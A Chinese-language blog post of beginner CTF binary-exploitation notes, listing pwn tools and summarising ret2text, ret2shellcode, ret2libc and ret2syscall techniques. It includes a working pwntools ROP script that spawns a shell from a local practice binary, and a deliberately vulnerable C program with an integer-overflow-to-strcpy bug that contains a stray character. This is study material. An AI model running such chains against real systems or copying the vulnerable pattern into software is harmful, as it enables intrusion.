Pwn-基础

2023-08-28

字数统计: 893字 | 阅读时长≈ 4分

暂时不打算学Pwn,不过这里把一些以前觉得不错的网站记录下来.

Pwn-基础

工具

checksec

检查保护

1	checksec --file <file>

pwndbg

https://github.com/pwndbg/pwndbg

OneGadget

david942j/one_gadget: The best tool for finding one gadget RCE in libc.so.6 (github.com)

寻找execve('/bin/sh', NULL, NULL)

1	one_gadget /lib/x86_64-linux-gnu/libc.so.6

LibSearcher

lieanu/LibcSearcher: glibc offset search for ctf. (github.com)

http://libc.blukat.me

main_arena_offset

bash-c/main_arena_offset: A simple shell script to get main_arena offset of a given libc (github.com)

1	./main_arena /lib/x86_64-linux-gnu/libc.so.6

Pwntools

Gallopsled/pwntools: CTF framework and exploit development library (github.com)

安装

Installation — pwntools 4.11.1 documentation

然后还要安装gdb上的pwndbg

1	git clone https://github.com/pwndbg/pwndbg

简单使用

PWN从入门到放弃（一）：PWNTOOLS_哔哩哔哩_bilibili

p = process("./a.out")
p.read()
p.send()

p = gdb.debug("./ret2shellcode", "break *0x80485c6")

ret2text

同一个程序内的text段内已经有system("/bin/sh")了，所以只需要修改控制流就可以触发。

基本 ROP - CTF Wiki (ctf-wiki.org)

ret2shellcode

基本 ROP - CTF Wiki (ctf-wiki.org)

存在可执行修改数据段
栈溢出从而劫持控制流，同时也能用于修改数据段的数据用于执行shellcode
控制流劫持到修改的地方

莫名其妙bss段变成了不可执行段，还是pwn不出来

ret2libc

通过溢出覆盖返回地址，劫持控制流

手把手教你栈溢出从入门到放弃（上） - 知乎 (zhihu.com)

Classic Stack Based Buffer Overflow – sploitF-U-N (wordpress.com)

ret2syscall(ROP)

执行一连串的gadget
主要是通过函数结尾的一些类似pop eax这样的汇编来将栈内的攻击数据拷贝到寄存器上
ret劫持一连串的控制流
最后想办法触发syscall

基本 ROP - CTF Wiki (ctf-wiki.org)

https://zh.wikipedia.org/wiki/%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8

1
2
3

ROPgadget --binary rop  --only 'pop|ret' | grep 'eax'
ROPgadget --binary rop  --string '/bin/sh'
ROPgadget --binary rop  --only 'int'

#!/usr/bin/env python
from pwn import *

sh = process('./rop')

pop_eax_ret = 0x080bb196
pop_edx_ecx_ebx_ret = 0x0806eb90
int_0x80 = 0x08049421
binsh = 0x80be408
payload = flat(
    ['A' * 112, pop_eax_ret, 0xb, pop_edx_ecx_ebx_ret, 0, 0, binsh, int_0x80])
sh.sendline(payload)
sh.interactive()

注意ROP编程的顺序：

1	函数地址，返回地址，参数表

Integer Overflow

Integer Overflow – sploitF-U-N (wordpress.com)

//vuln.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void store_passwd_indb(char* passwd) {
}

void validate_uname(char* uname) {
}

void validate_passwd(char* passwd) {
 char passwd_buf[11];
 unsigned char passwd_len = strlen(passwd); /* [1] */ 
 if(passwd_len >= 4 && passwd_len <= 8) { /* [2] */
  printf("Valid Password\n"); /* [3] */ 
  fflush(stdout);
  strcpy(passwd_buf,passwd); /* [4] */
 } else {
  printf("Invalid Password\n"); /* [5] */
  fflush(stdout);
 }
 store_passwd_indb(passwd_buf); /* [6] */
}

int main(int argc, char* argv[]) {
 if(argc!=3) {
  printf("Usage Error:   \n");
  fflush(stdout);
  exit(-1);
 }c
 validate_uname(argv[1]);
 validate_passwd(argv[2]);
 return 0;
}